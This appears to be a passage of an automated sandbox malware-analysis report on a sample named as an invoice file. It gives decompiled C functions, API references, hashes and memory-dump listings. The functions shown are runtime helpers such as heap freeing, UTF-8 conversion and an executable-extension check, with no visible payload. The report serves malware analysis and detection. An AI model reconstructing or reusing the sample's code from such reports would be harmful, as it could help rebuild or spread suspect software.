                            0x01327f7c
                            0x01327f87
                            0x01327f95
                            0x01327fa3
                            0x01327fb4
                            0x01327fc2
                            0x01327fd0
                            0x01327fdb
                            0x01327fe6
                            0x01327ff1
                            0x00000000
                            0x01328001
                            0x01328006

                            APIs
                              • Part of subcall function 01327EE7: _free.LIBCMT ref: 01327F10
                            • _free.LIBCMT ref: 01327F71
                              • Part of subcall function 013209EB: RtlFreeHeap.NTDLL(00000000,00000000,?,01327F15,?,00000000,?,00000000,?,01327F3C,?,00000007,?,?,01328393,?), ref: 01320A01
                              • Part of subcall function 013209EB: GetLastError.KERNEL32(?,?,01327F15,?,00000000,?,00000000,?,01327F3C,?,00000007,?,?,01328393,?,?), ref: 01320A13
                            • _free.LIBCMT ref: 01327F7C
                            • _free.LIBCMT ref: 01327F87
                            • _free.LIBCMT ref: 01327FDB
                            • _free.LIBCMT ref: 01327FE6
                            • _free.LIBCMT ref: 01327FF1
                            • _free.LIBCMT ref: 01327FFC
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: 3345dd58f07dd0924e1d91aec4a26e5c9fbf2f87a575c696f6c07352f37f02c3
                            • Instruction ID: 4e8a999cd631be2a9efa90b18e16dabc4b586f82fe58bef6d3e92179e50681f8
                            • Opcode Fuzzy Hash: 3345dd58f07dd0924e1d91aec4a26e5c9fbf2f87a575c696f6c07352f37f02c3
                            • Instruction Fuzzy Hash: E3110D71650B26ABE620F7B5CC07FCB77EC6F24718F404C19F39E66060DA75AD0846A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01314BF0, Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 61COMMON
                            Download Yara Rule
                            C-Code - Quality: 28%
                            			E01314BF0(short* _a4, char* _a8, int _a12) {
				void* _t17;
				void* _t18;
				int _t19;
				short* _t20;
				void* _t21;

				_t20 = _a4;
				if(_t20 != 0) {
					_t19 = _a12;
					goto L6;
				} else {
					_t19 = MultiByteToWideChar(0xfde9, _t20, _a8, 0xffffffff, _t20, _t20);
					_t26 = _t19;
					if(_t19 != 0) {
						_t3 = _t19 + 1; // 0x1
						_push(2);
						_t20 = E013197F8(_t17);
						_t21 = _t21 + 8;
						__eflags = _t20;
						if(__eflags != 0) {
							L6:
							__eflags = MultiByteToWideChar(0xfde9, 0, _a8, 0xffffffff, _t20, _t19);
							if(__eflags != 0) {
								return _t20;
							} else {
								_push("Failed to decode wchar_t from UTF-8\n");
								_push("MultiByteToWideChar");
								E01311860(_t18, __eflags);
								__eflags = 0;
								return 0;
							}
						} else {
							_push("Out of memory.");
							_push("win32_utils_from_utf8");
							E01311860(_t18, __eflags);
							__eflags = 0;
							return 0;
						}
					} else {
						_push("Failed to get wchar_t buffer size.\n");
						_push("MultiByteToWideChar");
						E01311860(_t18, _t26);
						return 0;
					}
				}
			}








                            0x01314bf1
                            0x01314bf8
                            0x01314c56
                            0x00000000
                            0x01314bfa
                            0x01314c0e
                            0x01314c10
                            0x01314c12
                            0x01314c2b
                            0x01314c2e
                            0x01314c36
                            0x01314c38
                            0x01314c3b
                            0x01314c3d
                            0x01314c5a
                            0x01314c6f
                            0x01314c71
                            0x01314c8e
                            0x01314c73
                            0x01314c73
                            0x01314c78
                            0x01314c7d
                            0x01314c85
                            0x01314c89
                            0x01314c89
                            0x01314c3f
                            0x01314c3f
                            0x01314c44
                            0x01314c49
                            0x01314c51
                            0x01314c55
                            0x01314c55
                            0x01314c14
                            0x01314c14
                            0x01314c19
                            0x01314c1e
                            0x01314c2a
                            0x01314c2a
                            0x01314c12

                            APIs
                            • MultiByteToWideChar.KERNEL32(0000FDE9,?,?,000000FF,?,?,?,?,01314117,?,?,00001000), ref: 01314C08
                              • Part of subcall function 01311860: GetLastError.KERNEL32(?,?), ref: 0131187D
                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,?,?,?,01314117,?,?,00001000), ref: 01314C69
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide$ErrorLast
                            • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                            • API String ID: 1717984340-306716450
                            • Opcode ID: d9ac8dc41b34e30ca225d4eb0fae9cfa793ec6bd08d2d2bae69c0e0277dd156e
                            • Instruction ID: bfadb775df73f8b16adf56001fb02478da363a164cc6da01edd9fd3653822229
                            • Opcode Fuzzy Hash: d9ac8dc41b34e30ca225d4eb0fae9cfa793ec6bd08d2d2bae69c0e0277dd156e
                            • Instruction Fuzzy Hash: 7B012D3774423276CA25656F7C09ECB6698DFC0BBEF150625FA14A2284D250840582F6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01328F51, Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                            Download Yara Rule
                            C-Code - Quality: 71%
                            			E01328F51(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t56;
				signed int _t58;
				short* _t60;
				signed int _t64;
				short* _t68;
				int _t76;
				short* _t79;
				signed int _t85;
				signed int _t88;
				void* _t93;
				void* _t94;
				int _t96;
				short* _t99;
				int _t101;
				int _t103;
				signed int _t104;
				short* _t105;
				void* _t108;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x133c008; // 0xa3433343
				_v8 = _t49 ^ _t104;
				_t101 = _a20;
				if(_t101 > 0) {
					_t76 = E0132CA63(_a16, _t101);
					_t108 = _t76 - _t101;
					_t4 = _t76 + 1; // 0x1
					_t101 = _t4;
					if(_t108 >= 0) {
						_t101 = _t76;
					}
				}
				_t96 = _a32;
				if(_t96 == 0) {
					_t96 =  *( *_a4 + 8);
					_a32 = _t96;
				}
				_t54 = MultiByteToWideChar(_t96, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t101, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					E0131786A();
					return _t54;
				} else {
					_t93 = _t54 + _t54;
					_t83 = _t93 + 8;
					asm("sbb eax, eax");
					if((_t93 + 0x00000008 & _t54) == 0) {
						_t79 = 0;
						__eflags = 0;
						L14:
						if(_t79 == 0) {
							L36:
							_t103 = 0;
							L37:
							E0132815E(_t79);
							_t54 = _t103;
							goto L38;
						}
						_t56 = MultiByteToWideChar(_t96, 1, _a16, _t101, _t79, _v12);
						_t119 = _t56;
						if(_t56 == 0) {
							goto L36;
						}
						_t98 = _v12;
						_t58 = E01323980(_t83, _t119, _a8, _a12, _t79, _v12, 0, 0, 0, 0, 0);
						_t103 = _t58;
						if(_t103 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t94 = _t103 + _t103;
							_t85 = _t94 + 8;
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							__eflags = _t85 & _t58;
							if((_t85 & _t58) == 0) {
								_t99 = 0;
								__eflags = 0;
								L30:
								__eflags = _t99;
								if(__eflags == 0) {
									L35:
									E0132815E(_t99);
									goto L36;
								}
								_t60 = E01323980(_t85, __eflags, _a8, _a12, _t79, _v12, _t99, _t103, 0, 0, 0);
								__eflags = _t60;
								if(_t60 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t103 = WideCharToMultiByte(_a32, 0, _t99, _t103, ??, ??, ??, ??);
								__eflags = _t103;
								if(_t103 != 0) {
									E0132815E(_t99);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t88 = _t94 + 8;
							__eflags = _t94 - _t88;
							asm("sbb eax, eax");
							_t64 = _t58 & _t88;
							_t85 = _t94 + 8;
							__eflags = _t64 - 0x400;
							if(_t64 > 0x400) {
								__eflags = _t94 - _t85;
								asm("sbb eax, eax");
								_t99 = E01320A25(_t85, _t64 & _t85);
								_pop(_t85);
								__eflags = _t99;
								if(_t99 == 0) {
									goto L35;
								}
								 *_t99 = 0xdddd;
								L28:
								_t99 =  &(_t99[4]);
								goto L30;
							}
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							E0132F250();
							_t99 = _t105;
							__eflags = _t99;
							if(_t99 == 0) {
								goto L35;
							}
							 *_t99 = 0xcccc;
							goto L28;
						}
						_t68 = _a28;
						if(_t68 == 0) {
							goto L37;
						}
						_t123 = _t103 - _t68;
						if(_t103 > _t68) {
							goto L36;
						}
						_t103 = E01323980(0, _t123, _a8, _a12, _t79, _t98, _a24, _t68, 0, 0, 0);
						if(_t103 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t70 = _t54 & _t93 + 0x00000008;
					_t83 = _t93 + 8;
					if((_t54 & _t93 + 0x00000008) > 0x400) {
						__eflags = _t93 - _t83;
						asm("sbb eax, eax");
						_t79 = E01320A25(_t83, _t70 & _t83);
						_pop(_t83);
						__eflags = _t79;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t79 = 0xdddd;
						L12:
						_t79 =  &(_t79[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E0132F250();
					_t79 = _t105;
					if(_t79 == 0) {
						goto L36;
					}
					 *_t79 = 0xcccc;
					goto L12;
				}
			}


























                            0x01328f56
                            0x01328f57
                            0x01328f58
                            0x01328f5f
                            0x01328f64
                            0x01328f6a
                            0x01328f70
                            0x01328f76
                            0x01328f79
                            0x01328f79
                            0x01328f7c
                            0x01328f7e
                            0x01328f7e
                            0x01328f7c
                            0x01328f80
                            0x01328f85
                            0x01328f8c
                            0x01328f8f
                            0x01328f8f
                            0x01328fab
                            0x01328fb1
                            0x01328fb6
                            0x01329149
                            0x01329154
                            0x0132915c
                            0x01328fbc
                            0x01328fbc
                            0x01328fbf
                            0x01328fc4
                            0x01328fc8
                            0x0132901c
                            0x0132901c
                            0x0132901e
                            0x01329020
                            0x0132913e
                            0x0132913e
                            0x01329140
                            0x01329141
                            0x01329147
                            0x00000000
                            0x01329147
                            0x01329031
                            0x01329037
                            0x01329039
                            0x00000000
                            0x00000000
                            0x0132903f
                            0x01329051
                            0x01329056
                            0x0132905a
                            0x00000000
                            0x00000000
                            0x01329067
                            0x013290a1
                            0x013290a4
                            0x013290a7
                            0x013290a9
                            0x013290ab
                            0x013290ad
                            0x013290f9
                            0x013290f9
                            0x013290fb
                            0x013290fb
                            0x013290fd
                            0x01329137
                            0x01329138
                            0x00000000
                            0x0132913d
                            0x01329111
                            0x01329116
                            0x01329118
                            0x00000000
                            0x00000000
                            0x0132911c
                            0x0132911d
                            0x0132911e
                            0x01329121
                            0x0132915d
                            0x01329160
                            0x01329123
                            0x01329123
                            0x01329124
                            0x01329124
                            0x01329131
                            0x01329133
                            0x01329135
                            0x01329166
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x01329135
                            0x013290af
                            0x013290b2
                            0x013290b4
                            0x013290b6
                            0x013290b8
                            0x013290bb
                            0x013290c0
                            0x013290db
                            0x013290dd
                            0x013290e7
                            0x013290e9
                            0x013290ea
                            0x013290ec
                            0x00000000
                            0x00000000
                            0x013290ee
                            0x013290f4
                            0x013290f4
                            0x00000000
                            0x013290f4
                            0x013290c2
                            0x013290c4
                            0x013290c8
                            0x013290cd
                            0x013290cf
                            0x013290d1
                            0x00000000
                            0x00000000
                            0x013290d3
                            0x00000000
                            0x013290d3
                            0x01329069
                            0x0132906e
                            0x00000000
                            0x00000000
                            0x01329074
                            0x01329076
                            0x00000000
                            0x00000000
                            0x01329092
                            0x01329096
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0132909c
                            0x01328fcf
                            0x01328fd1
                            0x01328fd3
                            0x01328fdb
                            0x01328ffa
                            0x01328ffc
                            0x01329006
                            0x01329008
                            0x01329009
                            0x0132900b
                            0x00000000
                            0x00000000
                            0x01329011
                            0x01329017
                            0x01329017
                            0x00000000
                            0x01329017
                            0x01328fdf
                            0x01328fe3
                            0x01328fe8
                            0x01328fec
                            0x00000000
                            0x00000000
                            0x01328ff2
                            0x00000000
                            0x01328ff2

                            APIs
                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0131C00D,0131C00D,?,?,?,013291A2,00000001,00000001,DEE85006), ref: 01328FAB
                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,013291A2,00000001,00000001,DEE85006,?,?,?), ref: 01329031
                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,DEE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0132912B
                            • __freea.LIBCMT ref: 01329138
                              • Part of subcall function 01320A25: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,013280E5,00000000,?,01320C3C,?,00000008,?,01323E2E,?,?,?), ref: 01320A57
                            • __freea.LIBCMT ref: 01329141
                            • __freea.LIBCMT ref: 01329166
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                            • String ID:
                            • API String ID: 1414292761-0
                            • Opcode ID: 90fb8d2ace449951e5bec308297b8a50fea47f156d5989593e1654393791ad23
                            • Instruction ID: c7aa4dd68e4af622cb59dfa7c3cbc7cc1c169d6af6af7919a172d54a677224f5
                            • Opcode Fuzzy Hash: 90fb8d2ace449951e5bec308297b8a50fea47f156d5989593e1654393791ad23
                            • Instruction Fuzzy Hash: 4951B67261023AABEB25AE69DC44FBB7BAAEF4465CF25462CFD04D6140DB34EC44C790
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01324425, Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                            Download Yara Rule
                            C-Code - Quality: 71%
                            			E01324425(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x133c238; // 0x6
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E01320B10(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E01323862(_t25, __eflags,  *0x133c238, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E01324297(_t25, _t31, 0x13463f0);
							E013209EB(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E013209EB();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E01320ACD(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x133c238; // 0x6
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E01320B10(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E01323862(_t27, __eflags,  *0x133c238, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E01324297(_t27, _t32, 0x13463f0);
									E013209EB(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E013209EB();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E0132380C(_t25, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E0132380C(_t23, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}





















                            0x01324425
                            0x01324425
                            0x01324425
                            0x0132442f
                            0x01324431
                            0x01324436
                            0x01324439
                            0x01324447
                            0x0132444e
                            0x01324453
                            0x01324456
                            0x01324459
                            0x0132446b
                            0x01324470
                            0x01324472
                            0x0132447d
                            0x01324484
                            0x01324489
                            0x0132448c
                            0x0132448e
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x01324474
                            0x01324474
                            0x00000000
                            0x01324474
                            0x0132445b
                            0x0132445b
                            0x0132445c
                            0x0132445c
                            0x01324461
                            0x0132449c
                            0x0132449d
                            0x013244a3
                            0x013244a8
                            0x013244ab
                            0x013244ac
                            0x013244ad
                            0x013244b4
                            0x013244b6
                            0x013244b8
                            0x013244bd
                            0x013244c0
                            0x013244ce
                            0x013244da
                            0x013244dd
                            0x013244e0
                            0x013244f2
                            0x013244f7
                            0x013244f9
                            0x01324504
                            0x0132450a
                            0x01324512
                            0x01324514
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x013244fb
                            0x013244fb
                            0x00000000
                            0x013244fb
                            0x013244e2
                            0x013244e2
                            0x013244e3
                            0x013244e3
                            0x01324516
                            0x01324517
                            0x01324517
                            0x013244c2
                            0x013244c8
                            0x013244cc
                            0x0132451f
                            0x01324520
                            0x01324526
                            0x00000000
                            0x00000000
                            0x00000000
                            0x013244cc
                            0x0132452d
                            0x0132452d
                            0x0132443b
                            0x01324441
                            0x01324445
                            0x01324490
                            0x01324491
                            0x0132449b
                            0x00000000
                            0x00000000
                            0x00000000
                            0x01324445

                            APIs
                            • GetLastError.KERNEL32(?,00000000,0131AFEC,00000000,?,?,0131A8EB,?,?,00000000), ref: 01324429
                            • _free.LIBCMT ref: 0132445C
                            • _free.LIBCMT ref: 01324484
                            • SetLastError.KERNEL32(00000000,?,00000000), ref: 01324491
                            • SetLastError.KERNEL32(00000000,?,00000000), ref: 0132449D
                            • _abort.LIBCMT ref: 013244A3
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ErrorLast$_free$_abort
                            • String ID:
                            • API String ID: 3160817290-0
                            • Opcode ID: aa70044f5ee7cd8a4832bdc3616c735a6db248ac7fc022410018da51c89c9566
                            • Instruction ID: 48c04078b80047f953cfef0d1a04ca6adfce44a717642b6d56829de36ea83445
                            • Opcode Fuzzy Hash: aa70044f5ee7cd8a4832bdc3616c735a6db248ac7fc022410018da51c89c9566
                            • Instruction Fuzzy Hash: 88F04632204B3277D62A327D6C08F2F2A7E9FC1B3CF200115F918F6195EF60C8068265
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0131D000, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 51COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E0131D000(void* __ebx, void* __edi, intOrPtr _a4) {
				void* __esi;
				void* _t4;

				_t21 = __edi;
				_t10 = __ebx;
				if(_a4 != 0) {
					_t23 = E0132F355(_a4, 0x2e);
					if(_t3 == 0 || E013251D5(__ebx, __edi, _t23, _t23, L".exe") != 0 && E013251D5(__ebx, __edi, _t23, _t23, L".cmd") != 0 && E013251D5(_t10, _t21, _t23, _t23, L".bat") != 0 && E013251D5(_t10, _t21, _t23, _t23, L".com") != 0) {
						_t4 = 0;
					} else {
						_t4 = 1;
					}
					return _t4;
				} else {
					return 0;
				}
			}





                            0x0131d000
                            0x0131d000
                            0x0131d009
                            0x0131d01a
                            0x0131d020
                            0x0131d066
                            0x0131d06a
                            0x0131d06a
                            0x0131d06a
                            0x0131d06e
                            0x0131d00b
                            0x0131d00e
                            0x0131d00e

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: _wcsrchr
                            • String ID: .bat$.cmd$.com$.exe
                            • API String ID: 1752292252-4019086052
                            • Opcode ID: c6e8f711095726d4300f1bc4e9e50b4633e67291ead793769a7cc265e9e4f9e8
                            • Instruction ID: 2395bf84c06812b81f25b4b10ef1fc1c242fbb716d3831d5d651da67ddf11104
                            • Opcode Fuzzy Hash: c6e8f711095726d4300f1bc4e9e50b4633e67291ead793769a7cc265e9e4f9e8
                            • Instruction Fuzzy Hash: 58F0BB3354A72735FD2D359E6C06ADB1B9C4F935FDB34001AFA0456AC4DE51E58350AC
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 013201DD, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                            Download Yara Rule
                            C-Code - Quality: 37%
                            			E013201DD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _t10;
				int _t12;
				int _t19;
				signed int _t21;

				_t10 =  *0x133c008; // 0xa3433343
				_v8 = _t10 ^ _t21;
				_v12 = _v12 & 0x00000000;
				_t12 =  &_v12;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
				if(_t12 != 0) {
					_t12 = GetProcAddress(_v12, "CorExitProcess");
					_t19 = _t12;
					if(_t19 != 0) {
						 *0x133019c(_a4);
						_t12 =  *_t19();
					}
				}
				if(_v12 != 0) {
					_t12 = FreeLibrary(_v12);
				}
				E0131786A();
				return _t12;
			}









                            0x013201e4
                            0x013201eb
                            0x013201ee
                            0x013201f2
                            0x013201fd
                            0x01320205
                            0x01320210
                            0x01320216
                            0x0132021a
                            0x01320221
                            0x01320227
                            0x01320227
                            0x01320229
                            0x0132022e
                            0x01320233
                            0x01320233
                            0x0132023e
                            0x01320246

                            APIs
                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0132018E,?,?,0132012E,?,0133A6E0,0000000C,01320285,?,00000002), ref: 013201FD
                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 01320210
                            • FreeLibrary.KERNEL32(00000000,?,?,?,0132018E,?,?,0132012E,?,0133A6E0,0000000C,01320285,?,00000002,00000000), ref: 01320233
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: AddressFreeHandleLibraryModuleProc
                            • String ID: CorExitProcess$mscoree.dll
                            • API String ID: 4061214504-1276376045
                            • Opcode ID: 9c5471be0490e04f043c39f69399195db0c7d4f3522b7c0b8a60e68e77a55b23
                            • Instruction ID: df960972871a1bb0b8f81588e731659e347d87df2ae383f1bc2075812b6b3f83
                            • Opcode Fuzzy Hash: 9c5471be0490e04f043c39f69399195db0c7d4f3522b7c0b8a60e68e77a55b23
                            • Instruction Fuzzy Hash: F8F06235A1021CBFDB299F95DC09B9DBFBCEF49716F000169F909A2240DB349A44CB94
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 013205E4, Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                            Download Yara Rule
                            C-Code - Quality: 83%
                            			E013205E4(signed int* __ecx, signed int __edx) {
				signed int _v8;
				intOrPtr* _v12;
				signed int _v16;
				signed int _t28;
				signed int _t29;
				intOrPtr _t33;
				signed int _t37;
				signed int _t38;
				signed int _t40;
				void* _t50;
				signed int _t56;
				intOrPtr* _t57;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t78;
				signed int _t80;
				signed int* _t81;
				signed int _t85;
				void* _t86;

				_t72 = __edx;
				_v12 = __ecx;
				_t28 =  *__ecx;
				_t81 =  *_t28;
				if(_t81 != 0) {
					_t29 =  *0x133c008; // 0xa3433343
					_t56 =  *_t81 ^ _t29;
					_t78 = _t81[1] ^ _t29;
					_t83 = _t81[2] ^ _t29;
					asm("ror edi, cl");
					asm("ror esi, cl");
					asm("ror ebx, cl");
					if(_t78 != _t83) {
						L14:
						 *_t78 = E0131F6AC( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
						_t33 = E01319353(_t56);
						_t57 = _v12;
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
						_t24 = _t78 + 4; // 0x4
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E01319353(_t24);
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E01319353(_t83);
						_t37 = 0;
						L15:
						return _t37;
					}
					_t38 = 0x200;
					_t85 = _t83 - _t56 >> 2;
					if(_t85 <= 0x200) {
						_t38 = _t85;
					}
					_t80 = _t38 + _t85;
					if(_t80 == 0) {
						_t80 = 0x20;
					}
					if(_t80 < _t85) {
						L9:
						_push(4);
						_t80 = _t85 + 4;
						_push(_t80);
						_v8 = E0132850F(_t56);
						_t40 = E013209EB(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							goto L11;
						}
						_t37 = _t40 | 0xffffffff;
						goto L15;
					} else {
						_push(4);
						_push(_t80);
						_v8 = E0132850F(_t56);
						E013209EB(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							L11:
							_t56 = _t68;
							_v8 = _t68 + _t85 * 4;
							_t83 = _t68 + _t80 * 4;
							_t78 = _v8;
							_push(0x20);
							asm("ror eax, cl");
							_t71 = _t78;
							_v16 = 0 ^  *0x133c008;
							asm("sbb edx, edx");
							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
							_v8 = _t74;
							if(_t74 == 0) {
								goto L14;
							}
							_t75 = _v16;
							_t50 = 0;
							do {
								_t50 = _t50 + 1;
								 *_t71 = _t75;
								_t71 = _t71 + 4;
							} while (_t50 != _v8);
							goto L14;
						}
						goto L9;
					}
				}
				return _t28 | 0xffffffff;
			}

























                            0x013205e4
                            0x013205ee
                            0x013205f2
                            0x013205f4
                            0x013205f8
                            0x01320602
                            0x01320613
                            0x01320618
                            0x0132061a
                            0x0132061c
                            0x0132061e
                            0x01320620
